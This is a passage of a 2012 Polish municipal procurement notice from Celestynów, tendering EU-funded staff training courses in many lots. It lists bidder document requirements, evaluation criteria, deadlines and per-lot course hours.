<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty  Wykonawca zobowiązany  jest dołączyć: 
WYKAZ  WYKONANYCH USŁUG do  kryterium oceny ofert Doświadczenie, w okresie 3 lat przed wszczęciem postępowania,
dokument zawierający propozycje dodatkowych działań oraz dodatkowe propozycje organizacyjne Wykonawcy zgodnie z  zapisami SIWZ .13.1.3. do  kryterium oceny ofert Koncepcja realizacji zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie - 20</li>
<li>3 - Koncepcja realizacji zamówienia - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne zmiany treści umowy mogą wynikać z następujących okoliczności:
1)	w zakresie wysokości wynagrodzenia tylko w związku ze zmianą przepisów podatkowych (zmian stawki podatku VAT),
2)	w przypadku gdy nastąpi zmiana obowiązujących przepisów prawa wymagająca wprowadzenia odpowiednich modyfikacji w umowie,
3)	w przypadku gdy w trakcie dokonywania bieżących uzgodnień z Zamawiającym, inną instytucją lub osobą fizyczną, nastąpiła istotna zmiana w zakresie rozwiązań projektowych.
W przypadku wystąpienia Wykonawcy z wnioskiem o zmianę postanowień zawartej umowy, zobowiązany jest on do wykazania i udokumentowania zaistnienia jednej z przesłanek wymienionych powyżej.
Zmiany treści umowy dopuszczone powyżej nie mogą prowadzić do zwiększenia wynagrodzenia określonego w umowy z zastrzeżeniem pkt 1.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.celestynow.pl/public/?id=108634<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na pisemny wniosek w siedzibie Urzędu Gminy Celestynów - Referat Zamówień Publicznych i Funduszy Zewnętrznych, ul. Regucka 3  05-430 Celestynów..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2012 godzina 10:00, miejsce: Urząd Gminy w Celestynowie  Biuro Obsługi Mieszkańca  ul. Regucka 3, 05-430 Celestynów..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowanie jest w  ramach  projektu konkursowego Profesjonalny 
i efektywny Urząd Gminy w Celestynowie! Program modernizacji i podniesienia jakości zarządzania w Urzędzie Gminy w Celestynowie, w ramach Priorytetu V Dobre rządzenie, Działania 5.2 Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1. Modernizacja zarządzania w administracji samorządowej w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Realizacja 3-dniowego szkolenia pt. Udzielanie zamówień publicznych w JST.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA KURSU/SZKOLENIA I SPOSÓB ORGANIZACJI KURSU:
1.1	Ilość godzin szkoleniowych: 24
1.2	Częstotliwość zajęć: 
1.2.1	3 dni szkoleniowe ciągłe
1.3	Ilość godzin teoretycznych: 19
1.4	Ilość godzin praktycznych: 5
1.5	Ilość uczestników: 12 osób/grupę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Realizacja 3-dniowego szkolenia pt. Kodeks postępowania administracyjnego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZAS TRWANIA KURSU/SZKOLENIA I SPOSÓB ORGANIZACJI SZKOLENIA:
1.1.Ilość godzin szkoleniowych: 24
1.2. Częstotliwość zajęć: 
1.2.1.dni szkoleniowe w trybie ciągłym
Ilość godzin teoretycznych: 18,5 godzin
Ilość godzin praktycznych: 5,5 godzin
Ilość uczestników: 12 osób/grupę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Realizacja 2-dniowego warsztatu pt. Tworzenie i zarządzanie budżetem zadaniowym w JST..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA SZKOLENIA WARSZTATOWEGO I SPOSÓB ORGANIZACJI SZKOLENIA WARSZTATOWEGO:
1.1	Ilość godzin szkoleniowych: 16
1.2	Częstotliwość zajęć: 
1.2.1	2 dni szkoleniowe ciągłe
1.3	Ilość godzin teoretycznych: 11,5 godziny
1.4	Ilość godzin praktycznych: 4,5 godziny
1.5	Ilość uczestników: 12 osób/grupę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Realizacja 2-dniowego szkolenia pt. Procedury kontroli i audytu w JST..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA SZKOLENIA I SPOSÓB ORGANIZACJI SZKOLENIA:
1.1	Ilość godzin szkoleniowych: 16
1.2	Częstotliwość zajęć: 
1.2.1	2 dni szkoleniowe ciągłe
1.3	Ilość godzin teoretycznych: 13,5 godziny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Realizacja 2-dniowego szkolenia pt.Zasady planowania rozwoju przestrzennego gminy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA SZKOLENIA I SPOSÓB ORGANIZACJI SZKOLENIA:
1.1	Ilość godzin szkoleniowych: 16
1.2	Częstotliwość zajęć: 
1.2.1	2 dni szkoleniowe ciągłe
1.3	Ilość godzin teoretycznych: 13
1.4	Ilość godzin praktycznych: 3
1.5	Ilość uczestników: 12 osób/grupę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Realizacja 2-dniowego szkolenia pt. Rachunkowość budżetowa w JST..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA SZKOLENIA I SPOSÓB ORGANIZACJI SZKOLENIA:
1.1.	Ilość godzin szkoleniowych: 16
1.2.	Częstotliwość zajęć: 
1.2.1.	2  dni szkoleniowe w trybie ciągłym
1.3.	Ilość godzin teoretycznych: 13 godzin
1.4.	Ilość godzin praktycznych: 3 godziny
1.5.	Ilość uczestników: 12 osób/grupę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Realizacja 2-dniowego warsztatu pt. Nowoczesne metody i techniki zarządzania zasobami ludzkimi w organizacjach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA SZKOLENIA WARSZTATOWEGO I SPOSÓB ORGANIZACJI WARSZTATU:
1.1.	Ilość godzin szkoleniowych: 16
1.2.	Częstotliwość zajęć: 
1.2.1.	2  dni szkoleniowe w trybie ciągłym
1.3.	Ilość godzin teoretycznych: 5,5 godziny
1.4.	Ilość godzin praktycznych: 10,5 godziny
1.5.	Ilość uczestników: 12 osób/grupę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Realizacja 2-dniowego szkolenia pt. Rola SKO i RIO w gminnym systemie legislacji lokalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA SZKOLENIA I SPOSÓB ORGANIZACJI SZKOLENIA:
1.1.	Ilość godzin szkoleniowych: 16
1.2.	Częstotliwość zajęć: 
1.2.1.	2  dni szkoleniowe w trybie ciągłym
1.3.	Ilość godzin teoretycznych: 14,5 godziny
1.4.	Ilość godzin praktycznych: 1,5 godziny
1.5.	Ilość uczestników: 12 osób/grupę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Realizacja 2-dniowego szkolenia pt. Zarządzanie finansami w JST..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA SZKOLENIA I SPOSÓB ORGANIZACJI SZKOLENIA:
1.1.	Ilość godzin szkoleniowych: 16
1.2.	Częstotliwość zajęć: 
1.2.1.	2  dni szkoleniowe w trybie ciągłym
1.3.	Ilość godzin teoretycznych: 11,5 godziny
1.4.	Ilość godzin praktycznych: 4,5 godziny
1.5.	Ilość uczestników: 12 osób/grupę

l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Realizacja 3-dniowego szkolenia pt. Zasady prowadzenia zrównoważonego rozwoju gminy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA SZKOLENIA I SPOSÓB ORGANIZACJI SZKOLENIA
1.1.	Ilość godzin szkoleniowych: 24
1.2.	Częstotliwość zajęć: 
1.2.1.	  3  dni szkoleniowe w trybie ciągłym
1.3.	Ilość godzin teoretycznych: 18,5 godzin
1.4.	Ilość godzin praktycznych: 5,5 godziny
1.5.	Ilość uczestników: 12 osób/grupę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Realizacja 2-dniowego szkolenia pt. Nowoczesne zarządzanie kryzysowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA SZKOLENIA I SPOSÓB ORGANIZACJI SZKOLENIA:
1.1.	Ilość godzin szkoleniowych: 16
1.2.	Częstotliwość zajęć: 
1.2.1.	     2  dni szkoleniowe w trybie ciągłym
1.3.	Ilość godzin teoretycznych: 12,5 godzin
1.4.	Ilość godzin praktycznych: 3,5 godziny
1.5.	Ilość uczestników: 12 osób/grupę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Realizacja 2-dniowego szkolenia pt. Prawo gospodarcze i działalność gospodarcza..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA SZKOLENIA I SPOSÓB ORGANIZACJI SZKOLENIA:
1.1.	Ilość godzin szkoleniowych: 16
1.2.	Częstotliwość zajęć: 
1.2.1.	2  dni szkoleniowe w trybie ciągłym
1.3.	Ilość godzin teoretycznych: 12 godzin
1.4.	Ilość godzin praktycznych: 4  godziny
1.5.	Ilość uczestników: 12 osób/grupę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Realizacja 2-dniowego szkolenia pt. Dobre praktyki w zakresie redagowania uchwał i zarządzeń w JST..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA SZKOLENIA I SPOSÓB ORGANIZACJI SZKOLENIA:
1.1.	Ilość godzin szkoleniowych: 16
1.2.	Częstotliwość zajęć: 
1.2.1.	2  dni szkoleniowe w trybie ciągłym
1.3.	Ilość godzin teoretycznych: 11 godzin
1.4.	Ilość godzin praktycznych: 5 godzin
1.5.	Ilość uczestników: 12 osób/grupę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Realizacja 3-dniowego warsztatu pt. Planowanie, zarządzanie i rozliczanie projektów EFS w JST..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA SZKOLENIA WARSZTATOWEGO I SPOSÓB ORGANIZACJI SZKOLENIA WARSZTATOWEGO:
1.1.	Ilość godzin szkoleniowych: 24
1.2.	Częstotliwość zajęć::
1.2.1.	   3 dni szkoleniowe w trybie ciągłym
1.3.	Ilość godzin teoretycznych:  9 godzin
1.4.	Ilość godzin praktycznych:  15 godzin
1.5.	Ilość uczestników: 12 osób/grupę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Realizacja 3-dniowego warsztatu dot. planowania, zarządzania i rozliczania projektów EFRR w JST.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA SZKOLENIA WARSZTATOWEGO I SPOSÓB ORGANIZACJI SZKOLENIA WARSZTATOWEGO:
1.1.	Ilość godzin szkoleniowych: 24
1.2.	Częstotliwość zajęć: 
1.2.1.	3 dni szkoleniowe w trybie ciągłym
1.3.	Ilość godzin teoretycznych: 8,5 godziny
1.4.	Ilość godzin praktycznych: 7,5  godziny
1.5.	Ilość uczestników: 12 osób/grupę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Realizacja 2-dniowego szkolenia pt. Zwiększenia efektywności współpracy z organizacjami pozarządowymi na terenie gminy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA SZKOLENIA I SPOSÓB ORGANIZACJI SZKOLENIA
1.1.	Ilość godzin szkoleniowych: 16
1.2.	Częstotliwość zajęć: 
1.2.1.	2  dni szkoleniowe w trybie ciągłym
1.3.	Ilość godzin teoretycznych: 12,5 godziny
1.4.	Ilość godzin praktycznych: 3,5 godziny
1.5.	Ilość uczestników: 12 osób/grupę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 20</li>
<li>3. Koncepcja realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Realizacja 2-dniowego szkolenia pt. Zlecanie zadań publicznych w gminie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	CZAS TRWANIA SZKOLENIA I SPOSÓB ORGANIZACJI SZKOLENIA:
1.1.	Ilość godzin szkoleniowych: 16
1.2.	Częstotliwość zajęć: 
1.2.1.	     2  dni szkoleniowe w trybie ciągłym
